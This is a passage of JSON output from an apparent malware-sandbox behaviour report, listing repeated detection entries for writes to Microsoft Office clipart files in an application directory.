"ref_gfncalls": [ { "ref_id": "gfn_33754", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090149.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090390.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33763", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090390.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090777.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33772", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090777.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090779.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33779", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090779.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090781.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33786", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090781.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0090783.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33793", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0090783.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0093905.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33800", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0093905.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0098497.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33811", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0098497.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099145.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33818", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099145.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099146.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33827", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099146.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099147.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33836", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099147.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099148.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33845", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099148.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099149.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33854", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099149.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099150.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33869", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099150.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099151.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33878", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099151.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099152.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33887", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099152.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099153.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33894", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099153.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099154.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33901", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099154.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099155.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33908", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099155.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099156.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33915", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099156.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099157.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33922", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099157.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099158.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33929", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099158.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099159.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33938", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099159.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099160.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33947", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099160.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099161.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33954", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099161.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099162.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33961", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099162.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099163.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33970", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099163.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099164.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33979", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099164.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099165.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_33988", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099165.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099166.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34001", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099166.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099167.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34014", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099167.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099168.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34025", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099168.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099169.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_34034", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099169.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099170.WMF", "hashes": [], "norm_filename": "c:\\program 